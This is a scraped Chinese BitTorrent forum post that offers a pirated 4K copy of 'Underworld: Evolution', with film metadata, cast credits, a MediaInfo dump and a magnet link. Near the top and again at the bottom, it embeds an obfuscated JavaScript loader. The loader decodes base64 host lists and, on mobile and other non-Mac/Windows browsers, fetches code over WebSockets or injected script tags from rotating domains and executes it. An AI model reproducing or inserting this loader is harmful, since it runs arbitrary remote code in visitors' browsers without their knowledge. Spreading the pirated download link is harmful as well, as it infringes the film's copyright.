黑夜传说2:进化[中文字幕].Underworld.Evolution.2006.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.x265-10bit 13.90GB

版主小s 22天前 225

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 黑夜传说2:进化 / 妖夜寻狼之魔间叛徒(港) / 决战异世界2(台)

◎片 名 Underworld: Evolution

◎年 代 2006

◎产 地 美国 / 加拿大

◎类 别 动作 / 惊悚 / 奇幻

◎语 言 英语 / 法语 / 匈牙利语

◎上映日期 2006-01-20(美国)

◎IMDb链接 https://www.imdb.com/title/tt0401855/

◎豆瓣评分 7.4/10 (67795人评价)

◎豆瓣链接 https://movie.douban.com/subject/1422920/

◎片 长 106 分钟

◎导 演 伦·怀斯曼 Len Wiseman (id:1031983)

◎编 剧 Danny McBride Danny McBride (id:1349517)

伦·怀斯曼 Len Wiseman (id:1031983)

凯文·格雷维奥斯 Kevin Grevioux (id:1336254)

丹尼·麦克布莱德 Danny McBride (id:1013797)

◎演 员 凯特·贝金赛尔 Kate Beckinsale (id:1003487)

斯科特·斯比德曼 Scott Speedman (id:1049589)

托尼·库兰 Tony Curran (id:1036415)

德里克·雅各比 Derek Jacobi (id:1027866)

比尔·奈伊 Bill Nighy (id:1041002)

斯蒂文·麦金托什 Steven Mackintosh (id:1048187)

山恩·布罗利 Shane Brolly (id:1032192)

布莱恩·斯蒂尔 Brian Steele (id:1052093)

兹塔·格罗格 Zita G?r?g (id:1181241)

约翰曼 John Mann (id:1120836)

麦克·辛 Michael Sheen (id:1004566)

索菲娅·迈尔斯 Sophia Myles (id:1031869)

理查德·赛特伦 Richard Cetrone (id:1280368)

Mike Mukatis Mike Mukatis (id:1292670)

Christine Danielle (id:1232046)

Kaja Gjesdal Kaja Gjesdal (id:1343827)

Alexander Grant Alexander Grant (id:1198097)

Monica Hamburg (id:1246482)

莉莉·莫·辛 Lily Mo Sheen (id:1004937)

安德烈·卡瓦德斯 Andrew Kavadas (id:1377662)

Kayla Levins Kayla Levins (id:1197463)

Raoul Ganeev Raoul Ganeev (id:1092038)

丹尼·帕皮诺 Dany Papineau (id:1127902)

肖恩·罗格森 Sean Rogerson (id:1202323)

阿德里安·霍夫 Adrian Hough (id:1344742)

Kurt Carley Kurt Carley (id:1070768)

麦克·冈瑟 Mike Gunther (id:1346354)

Henry Winterstern Henry Winterstern (id:1306229)

Skip Williamson Skip Williamson (id:1305268)

加里·卢切西 Gary Lucchesi (id:1290411)

理查德·S·莱特 Richard S. Wright (id:1023608)

汤姆·罗森伯格 Tom Rosenberg (id:1296083)

伦·怀斯曼 Len Wiseman (id:1031983)

大卫·科茨沃斯 David Coatsworth (id:1280930)

马可·贝尔崔米 Marco Beltrami (id:1027998)

西蒙·达根 Simon Duggan (id:1045667)

Jennifer L. Smith Jennifer L. Smith (id:1198453)

德博拉·阿奎拉 Deborah Aquila (id:1277347)

玛丽·特里西亚·伍德 Mary Tricia Wood (id:1165846)

帕特里克·塔特普洛斯 Patrick Tatopoulos (id:1298949)

Wendy Partridge Wendy Partridge (id:1294032)

Gina Sherritt Gina Sherritt (id:1297443)

托马斯·弗洛茨 Thomas Floutz (id:1283888)

Geoff Redknap Geoff Redknap (id:1295362)

Juliana Vit Juliana Vit (id:1153958)

Cristina Patterson Ceret Cristina Patterson Ceret (id:1133266)

阿迪纳·肖尔 Adina Shore (id:1055432)

苏珊·波伊德 Susan Boyd (id:1069324)

Shelley Kreutz Shelley Kreutz (id:1206056)

Brad Martin Brad Martin (id:1014368)

Shannon Pratt Shannon Pratt (id:1132306)

托尼·马加莱塔 Tony Magaletta (id:1124827)

David Luong (id:1240474)

克里斯坦·泽 Christian Zeh (id:1167122)

杰森·亚诺夫斯基 Jason Yanofsky (id:1220362)

蒂姆·基恩 Tim Keene (id:1112869)

小吉恩·沃伦 Gene Warren Jr. (id:1300455)

Andrew Shuford Andrew Shuford (id:1187488)

Lawrence Littleton Lawrence Littleton (id:1290161)

Gene Warren III Gene Warren III (id:1013356)

凯文·夸特曼 Kevin Quatman (id:1020123)

大卫·埃布纳 David Ebner (id:1302384)

安东尼·史密斯 Anthony Smith (id:1186232)

约瑟夫·扎基 Joseph Zaki (id:1188028)

◎标 签 吸血鬼 / 魔幻 / 美国 / 动作 / 狼人 / 科幻 / 奇幻 / 美国电影

◎简 介

狼人和吸血鬼之间的大战还在继续。当麦克尔(斯科特?斯比德曼 Scott Speedman 饰)和西丽妮(凯特?贝金赛尔 Kate Beckinsale 饰)还在企图以自己薄弱的能力阻止这场大战时,阴谋家们的杰作又诞生了――狼人和吸血鬼融合的具有超强能力的种族――“血族”。马克思(托尼?库兰 Tony Curran 饰)便是便是这个种族的第二代。他杀死了父亲,夺取了密钥和西丽妮的记忆,救出了一个是狼人、一个是吸血鬼的被囚禁千年的孪生兄弟,企图一统狼人、吸血鬼和人类三大种族。

麦克尔和西丽妮这对恋人为了爱,他们必须挫败马克思的阴谋、打败囚禁千年的孪生兄弟……

◎获奖情况 (共1项)

第15届MTV电影奖 (2006)

MTV电影奖 最佳英雄形象(提名)

└──凯特·贝金赛尔 (id:1003487)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 37028297150404976134220524859183150984 (0x1BDB6400244B846CBAD81C798C193788)

  4. Complete name : Underworld.Evolut[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 13.9 GiB

  8. Duration : 1 h 46 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 18.7 Mb/s

  11. Movie name : Underworld Evolution 2006 2160p HDR UHD BluRay TrueHD 7.1 Atmos [email protected]

  12. Encoded date : UTC 2021-11-08 22:43:09

  13. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  14. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@High

  20. HDR format : SMPTE ST 2086, HDR10 compatible

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 46 min

  23. Bit rate : 13.8 Mb/s

  24. Width : 3 840 pixels

  25. Height : 1 600 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.093

  33. Stream size : 10.2 GiB (74%)

  34. Title : @HDSky

  35. Writing library : x265 - H.265/HEVC codec

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.2020

  40. Transfer characteristics : PQ

  41. Matrix coefficients : BT.2020 non-constant

  42. Mastering display color primaries : Display P3

  43. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  44. Maximum Content Light Level : 739 cd/m2

  45. Maximum Frame-Average Light Level : 331 cd/m2


  46. Audio

  47. ID : 2

  48. Format : MLP FBA 16-ch

  49. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  50. Commercial name : Dolby TrueHD with Dolby Atmos

  51. Codec ID : A_TRUEHD

  52. Duration : 1 h 46 min

  53. Bit rate mode : Variable

  54. Bit rate : 4 821 kb/s

  55. Maximum bit rate : 7 806 kb/s

  56. Channel(s) : 8 channels

  57. Channel layout : L R C LFE Ls Rs Lb Rb

  58. Sampling rate : 48.0 kHz

  59. Frame rate : 1 200.000 FPS (40 SPF)

  60. Compression mode : Lossless

  61. Stream size : 3.58 GiB (26%)

  62. Title : English

  63. Language : English

  64. Default : Yes

  65. Forced : No

  66. Number of dynamic objects : 11

  67. Bed channel count : 1 channel

  68. Bed channel configuration : LFE


  69. Text #1

  70. ID : 3

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 45 min

  76. Bit rate : 17.1 kb/s

  77. Count of elements : 1647

  78. Stream size : 12.9 MiB (0%)

  79. Title : ENG

  80. Language : English

  81. Default : Yes

  82. Forced : No


  83. Text #2

  84. ID : 4

  85. Format : PGS

  86. Muxing mode : zlib

  87. Codec ID : S_HDMV/PGS

  88. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration : 1 h 45 min

  90. Bit rate : 11.9 kb/s

  91. Count of elements : 1122

  92. Stream size : 9.03 MiB (0%)

  93. Title : CHS

  94. Language : Chinese

  95. Default : No

  96. Forced : No


  97. Text #3

  98. ID : 5

  99. Format : PGS

  100. Muxing mode : zlib

  101. Codec ID : S_HDMV/PGS

  102. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration : 1 h 37 min

  104. Bit rate : 9 520 b/s

  105. Count of elements : 1102

  106. Stream size : 6.66 MiB (0%)

  107. Title : CHT

  108. Language : Chinese

  109. Default : No

  110. Forced : No


  111. Text #4

  112. ID : 6

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 37 min

  118. Bit rate : 15.1 kb/s

  119. Count of elements : 1120

  120. Stream size : 10.6 MiB (0%)

  121. Title : CHS

  122. Language : Chinese

  123. Default : No

  124. Forced : No


  125. Text #5

  126. ID : 7

  127. Format : PGS

  128. Muxing mode : zlib

  129. Codec ID : S_HDMV/PGS

  130. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  131. Duration : 1 h 37 min

  132. Bit rate : 15.5 kb/s

  133. Count of elements : 1120

  134. Stream size : 10.8 MiB (0%)

  135. Title : CHT

  136. Language : Chinese

  137. Default : No

  138. Forced : No


  139. Text #6

  140. ID : 8

  141. Format : PGS

  142. Muxing mode : zlib

  143. Codec ID : S_HDMV/PGS

  144. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  145. Duration : 1 h 37 min

  146. Bit rate : 23.4 kb/s

  147. Count of elements : 1120

  148. Stream size : 16.4 MiB (0%)

  149. Title : CHS&ENG

  150. Language : Chinese

  151. Default : No

  152. Forced : No


  153. Text #7

  154. ID : 9

  155. Format : PGS

  156. Muxing mode : zlib

  157. Codec ID : S_HDMV/PGS

  158. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  159. Duration : 1 h 37 min

  160. Bit rate : 23.8 kb/s

  161. Count of elements : 1120

  162. Stream size : 16.6 MiB (0%)

  163. Title : CHT&ENG

  164. Language : Chinese

  165. Default : No

  166. Forced : No


  167. Menu

  168. 00:00:00.000 : en:Chapter 01

  169. 00:09:45.919 : en:Chapter 02

  170. 00:12:20.823 : en:Chapter 03

  171. 00:17:17.828 : en:Chapter 04

  172. 00:23:11.807 : en:Chapter 05

  173. 00:33:47.943 : en:Chapter 06

  174. 00:38:57.961 : en:Chapter 07

  175. 00:43:31.692 : en:Chapter 08

  176. 00:49:11.824 : en:Chapter 09

  177. 00:56:43.859 : en:Chapter 10

  178. 01:03:08.827 : en:Chapter 11

  179. 01:10:37.316 : en:Chapter 12

  180. 01:17:17.049 : en:Chapter 13

  181. 01:21:32.596 : en:Chapter 14

  182. 01:28:48.823 : en:Chapter 15

  183. 01:32:18.158 : en:Chapter 16




复制代码


TAGS 动作 奇幻 惊悚

磁力链:
  • magnet:?xt=urn:btih:569548AB54FCFFB73114027B3231312A3B14D6B8

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};